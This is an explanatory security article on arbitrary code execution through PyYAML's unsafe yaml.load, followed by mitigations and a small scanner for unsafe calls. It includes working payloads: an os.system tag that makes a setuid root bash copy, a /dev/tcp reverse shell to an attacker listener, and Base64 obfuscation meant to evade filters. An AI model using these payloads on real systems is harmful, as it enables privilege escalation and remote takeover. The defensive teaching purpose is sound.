


PyYAML, a widely used YAML (YAML Ain't Markup Language) library for Python, allows the execution of arbitrary commands under certain conditions. The vulnerability arises when the yaml.load function is called without a safe loader. In PyYAML releases before 5.1, yaml.load defaults to a loader that can construct arbitrary Python objects, and the Loader and UnsafeLoader classes still do so whenever they are selected explicitly, which creates an attack surface for malicious payloads.
Exploitation via Arbitrary Command Execution
The fundamental risk lies in the deserialization process. When a YAML document contains a malicious payload, yaml.load processes the embedded Python-specific tags, potentially leading to code execution. For example, consider the following snippet:
import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage
Here, the yaml.load function parses example.yml without restrictions, making it vulnerable if the YAML content includes tags that construct Python objects. A typical exploit payload can be crafted to execute arbitrary system commands.
Example Payload
import yaml
from yaml import Loader, UnsafeLoader

# Malicious payload
payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]'

# Exploitation
yaml.load(payload)
yaml.load(payload, Loader=Loader)
yaml.load(payload, Loader=UnsafeLoader)
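Wherever one of these invocations ends up using an unsafe loader, it processes the payload and, when the script runs as root, creates a setuid copy of bash at /tmp/bash. Note that the first call, which passes no Loader, behaves this way only on PyYAML releases before 5.1; PyYAML 6.0 and later require the Loader argument. The resulting binary can then be executed with elevated privileges: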
/tmp/bash -p
This demonstrates the potential for privilege escalation if the vulnerability is exploited on a system with misconfigured permissions or other weaknesses.
Reverse Shell Exploitation
A particularly insidious use case is leveraging the vulnerability for a reverse shell. This allows attackers to gain remote access to the target machine. The process involves starting a listener on the attacker's machine and crafting a YAML document designed to establish the reverse connection.
On the attacker's machine, initiate a Netcat listener:
nc -lvnp 1234
On the target system, execute the following Python script as root:
import yaml

# Reverse shell payload
data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]'
yaml.load(data)  # Executes the reverse shell
This payload instructs the target machine to connect back to the attacker's listener, providing a fully interactive shell with the privileges of the executing process.
Base64 Encoding for Obfuscation
To bypass basic security controls or filters, the payload can be Base64-encoded. This method adds a layer of obfuscation, potentially evading detection by static analysis tools.
Example
from base64 import b64decode
import yaml

# Base64-encoded payload
encoded_payload = b"ISFweXRa...YXNoIl0="  # Truncated for brevity
payload = b64decode(encoded_payload)

# Execute the payload
yaml.load(payload)
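From the defender's side, the same encoding trick can be partly undone before any parsing happens. The following is a minimal sketch using only the standard library; the function name contains_python_tag and the tag pattern are illustrative assumptions, not part of PyYAML. It flags input that carries a Python-specific YAML tag either directly or under a single layer of Base64.

```python
import base64
import binascii
import re

# Python-specific YAML tags, in shorthand ("!!python/") and expanded form.
# The pattern is an assumption made for this sketch, not an exhaustive list.
PYTHON_TAG = re.compile(rb"!!python/|tag:yaml\.org,2002:python/")


def contains_python_tag(blob: bytes) -> bool:
    """Return True if blob, or its Base64 decoding, contains a python/ tag."""
    if PYTHON_TAG.search(blob):
        return True
    try:
        # validate=True rejects input that is not strictly Base64.
        decoded = base64.b64decode(blob.strip(), validate=True)
    except (binascii.Error, ValueError):
        return False
    return bool(PYTHON_TAG.search(decoded))


if __name__ == "__main__":
    harmless_tag = b"!!python/name:builtins.len"
    print(contains_python_tag(harmless_tag))
    print(contains_python_tag(base64.b64encode(harmless_tag)))
    print(contains_python_tag(b"name: example\nport: 8080\n"))
```

A check like this is only a heuristic: nested or alternative encodings will slip past it, so it complements a safe loader rather than replacing one.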
Mitigation Techniques
Professionals must adopt strict coding practices to eliminate such vulnerabilities. Recommended mitigations include:
Using Safe Loaders: Replace yaml.load with yaml.safe_load, which prevents the execution of arbitrary objects.
import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.safe_load(data)  # Safe usage: only standard YAML types are constructed
Restricting Input Sources: Ensure YAML inputs are sanitized and originate only from trusted sources.
Applying Static Analysis: Use tools to scan codebases for unsafe yaml.load invocations.
Environment Hardening: Restrict system permissions to minimize the impact of exploitation. For example, using containerized environments limits an attacker's ability to escalate privileges.
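The static analysis item above can be sketched with Python's built-in ast module. This is a simplified illustration rather than a replacement for a dedicated scanner such as Bandit: the function name find_unsafe_yaml_loads and the set of loaders treated as safe are assumptions made for this example, and the check only recognises calls written literally as yaml.load(...), so aliased imports or from yaml import load would be missed.

```python
import ast

# Loader class names treated as safe in this sketch (an assumption).
SAFE_LOADERS = {"SafeLoader", "CSafeLoader"}


def _loader_name(node):
    """Return the trailing identifier of a Loader expression, if any."""
    if isinstance(node, ast.Attribute):
        return node.attr  # e.g. yaml.SafeLoader
    if isinstance(node, ast.Name):
        return node.id  # e.g. SafeLoader
    return None


def find_unsafe_yaml_loads(source, filename="<string>"):
    """Return sorted (line, reason) tuples for risky yaml.load calls."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if not (
            isinstance(func, ast.Attribute)
            and func.attr == "load"
            and isinstance(func.value, ast.Name)
            and func.value.id == "yaml"
        ):
            continue
        # Loader may be given by keyword or as the second positional argument.
        loader = None
        for keyword in node.keywords:
            if keyword.arg == "Loader":
                loader = keyword.value
        if loader is None and len(node.args) >= 2:
            loader = node.args[1]
        if loader is None:
            findings.append((node.lineno, "yaml.load called without a Loader"))
        elif _loader_name(loader) not in SAFE_LOADERS:
            findings.append((node.lineno, "yaml.load called with a non-safe Loader"))
    return sorted(findings)


if __name__ == "__main__":
    sample = (
        "import yaml\n"
        "yaml.load(data)\n"
        "yaml.load(data, Loader=yaml.SafeLoader)\n"
        "yaml.load(data, Loader=yaml.UnsafeLoader)\n"
        "yaml.safe_load(data)\n"
    )
    for line, reason in find_unsafe_yaml_loads(sample):
        print(f"line {line}: {reason}")
```

Running a check like this in continuous integration would catch the unsafe pattern before it reaches production, though the loader allow-list should be adjusted to whatever a given codebase considers acceptable.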
The YAML library’s default behavior exemplifies the risks associated with deserialization in dynamically typed languages like Python. Exploiting this vulnerability requires minimal sophistication, making it a high-priority issue for secure application development. Adopting safe coding practices, along with robust input validation and runtime safeguards, is imperative to mitigate these risks effectively.